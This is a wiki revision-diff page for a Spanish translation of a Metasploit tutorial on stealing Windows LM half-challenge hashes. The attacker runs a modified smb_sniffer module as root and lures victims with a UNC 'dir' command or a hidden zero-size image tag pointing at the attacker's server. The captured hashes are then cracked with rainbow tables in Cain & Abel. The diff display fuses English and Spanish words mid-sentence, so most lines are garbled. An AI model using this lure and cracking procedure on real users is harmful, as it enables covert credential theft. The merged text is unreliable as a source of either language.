Diferencia entre revisiones de «Metasploit/TipsyTrucos»

Contenido eliminado Contenido añadido
Seath (discusión | contribs.)
Seath (discusión | contribs.)
Línea 63:
== LM Half-Challenge ==
 
OriginallyOriginalmente bloggedpublicada [http://grutztopia.jingojango.net/2007/04/ntlmv1-metasploit-and-you.html hereaquí] - UsingUsando thelas [http://www.freerainbowtables.com/index-rainbowtables-tables-halflmchall.html Free Rainbow Tables HALFLMCHALL Tables] andy auna modifiedversión Metasploitmodificada 2.7del smb_sniffermodulo exploit modulesmb_sniffer de Metasploit 2.7, obtainingobtener andy crackear crackinglos LANMANdesafios ChallengesLM hasnunca neverfue beentan easierfácil.
 
'''StepPaso 1.''' UseUsar Metasploit 2.7 (forpor nowahora) andy thela updatedactualización del exploit [http://grutz.jingojango.net/exploits/smb_sniffer.pm smb_sniffer.pm] exploit module. ThisEste doesno notfunciona worksobre onuna aplataforma Windows platform.
 
'''StepPaso 2.''' UnpackDesempaquetar Msf2.7 andy placecolocar smb_sniffer.pm underen theel exploits/directorio directoryexploits, replacingreemplazando thela olderversión versionantigua.
 
'''StepPaso 3.''' SetConfigura up yourtu Metasploit and runy itejecutalo ascomo root
 
<pre>
Línea 113:
</pre>
 
'''StepPaso 4.''' HaveHacer somebodyque connectalguien tose yourconecte server.a Ittu servidor. canPuede beser astan simple as acomo "dir \\serveripip_del_server\share" oro "<img src=\\serveripip_del_server\share\file.gif height=0 width=0>" tagen onuna somepágina HTML page. Windows willprocurará attempthacer tola makeconexión they connectionenviar andlas sendcredenciales thedel loggedusuario inque userse credentialsconecta a totu yourservidor waitingque serverespera.
 
[[Image:Metasploit-27-smbsniffer.png]]
 
'''StepPaso 5.''' TakeToma yourtu newnuevo archivo pwtest.txt filey andcopialo copya ituna overmáquina toque atenga Cain & AbleAbel machinecon thatlas has thetablas HALFLMCHALL tables.
 
[[Image:Metasploit-27-smbsniff-pw.png]]
Línea 123:
[[Image:Metasploit-27-cainadd.png]]
 
'''StepPaso 6.''' SelectSelecciona theel hash youque wantquieres to crackcrackear, rightclic clickderecho andy selectselecciona Cryptanalysis Attack->HALFLM Hashes + challenge->via RainbowTables, addañade thelas tables,tablas andy cracklisto!
 
[[Image:Metasploit-27-cainsuccesshalflm.png]]
 
'''CaveatsAdvertencias'''
 
* OnlySolamente LANMAN hashes canse bepuede obtainedobtener thisde wayesta manera. IfSi theel clientcliente deniesdeniega LM thenentonces toono badfunciona.
* Solamente los primeros 7 caracteres están en las tablas. Tienes que usar fuerza bruta para el resto.
* Only the first 7 characters are in the tables. You have to brute force the rest.
* Las tablas en total son de 54 GB. Tomará un cierto tiempo para cargarlas en memoria y para buscar.
* The tables are 54 GB total. It will take some time to load and search.